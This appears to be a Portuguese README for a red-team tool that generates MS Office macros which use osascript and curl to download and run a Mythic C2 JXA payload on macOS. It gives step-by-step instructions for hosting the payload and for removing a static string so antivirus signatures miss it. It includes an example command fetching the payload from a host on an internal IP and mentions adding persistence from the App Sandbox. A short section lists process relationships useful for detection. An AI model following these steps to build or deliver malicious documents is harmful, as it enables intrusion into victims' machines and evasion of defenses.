
Script Python3 para gerar uma macro para lançar um payload Mythic. Autor: Cedric Owens
Script Python3 para gerar macros do MS Office para lançar payloads JXA do Mythic.
Este script gera uma macro do Office que usa o osascript para baixar e executar o payload JXA .js do Mythic.
Passos:
Configure o servidor Mythic C2 e gere um payload jxa "apfell" (nota: este gerador presume que o payload está usando http, não https...se estiver usando https, você pode modificar o script do gerador para que o curl use https). Baixe esse payload no servidor Mythic.
Remova a primeira linha do launcher JXA .js do Mythic ("// Created by Cody Thomas - @its_a_feature_"). Sabe-se que algumas assinaturas estáticas de A/V verificam essa string estática. Hospede esse payload (ex: coloque o payload .js em uma pasta e use python -m SimpleHTTPServer para hospedar)
Execute este gerador de macro:
python3 jxa-macro.py -u [url para o payload .js hospedado no passo #2 acima]
exemplo: python3 jxa-macro.py -u http://192.168.1.1:8000/apfell2.js
O texto da macro será salvo em um arquivo no mesmo diretório chamado "macro.txt"
Copie e cole essa macro em um documento do MS Office.
Detecção:
Esta macro gera as seguintes relações pai-filho que podem ser usadas para detecção:
Produto do Office (ex: Microsoft Word.app) --> /bin/sh
Produto do Office (ex: Microsoft Word.app) --> /bin/bash
Produto do Office (ex: Microsoft Word.app) --> /usr/bin/curl
Nota: Isso lançará o payload JXA dentro do Sandbox do App. No entanto, o Mythic tem a capacidade de adicionar persistência de Item de Login mesmo a partir do Sandbox do App.